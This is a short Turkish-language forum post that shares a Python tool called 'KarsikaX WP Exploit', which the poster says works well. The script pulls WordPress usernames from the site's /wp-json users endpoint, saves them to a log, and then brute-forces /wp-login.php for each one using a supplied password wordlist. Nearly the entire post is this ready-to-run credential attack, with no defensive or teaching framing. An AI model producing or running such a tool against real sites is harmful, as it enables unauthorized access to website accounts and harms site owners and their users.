- 26 Kas 2023
- 161
- 96
Wordpressten usernameyi enum eder ve direkt bruteforce yapmaya çalışır gayette çalışıyor.
Python:
#!/usr/bin/env python3
import os
import subprocess
import requests
import json
user_agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0"
output_dir = "log"
wordlist_file = input("Wordlist: ")
def banner():
os.system("clear")
print(""" ##KarsikaX WP Exploit## """)
def create_log(url, user_list):
if not os.path.exists(output_dir):
os.makedirs(output_dir)
domain = url.split('//')[1].split('/')[0]
domain = domain.replace('.', '_')
with open(os.path.join(output_dir, domain), 'w') as file:
for user in user_list:
file.write(f"{user}\n")
print(f"[+] All found usernames are stored in {os.path.join(output_dir, domain)}")
def bruteforce(target, username, password_list):
for password in password_list:
login_url = f"{target}/wp-login.php"
data = {"log": username, "pwd": password, "wp-submit": "Log In"}
response = requests.post(login_url, data=data, headers={"User-Agent": user_agent})
if "wp-admin" in response.url:
print(f"[+] Successful login: {username} : {password}")
return True
print(f"[-] Brute-force unsuccessful for username: {username}")
return False
def read_wordlist(wordlist_file):
with open(wordlist_file, 'r') as file:
return [line.strip() for line in file.readlines()]
def enum_from_json(target):
url = f"{target}/wp-json/wp/v2/users/"
response = requests.get(url, headers={"User-Agent": user_agent})
if response.status_code != 200:
print("[-] Unable to find user from JSON")
else:
user_data = response.json()
user_list = [user["slug"] for user in user_data]
user_total = len(user_list)
print(f"[+] Found {user_total} usernames in /wp-json")
create_log(target, user_list)
wordlist = read_wordlist(wordlist_file)
for username in user_list:
bruteforce(target, username, wordlist)
def main(target):
def filter_url(url):
return not url.lower().startswith(("http://", "https://"))
if filter_url(target):
print("[-] Your given URL seems to be invalid.")
exit(1)
print(f"[+] Start scanning {target}")
enum_from_json(target)
print("[+] Finished scanning.")
if __name__ == "__main__":
banner()
import sys
if len(sys.argv) != 2:
print("[+] Usage: {} <url>".format(sys.argv[0]))
exit(0)
main(sys.argv[1])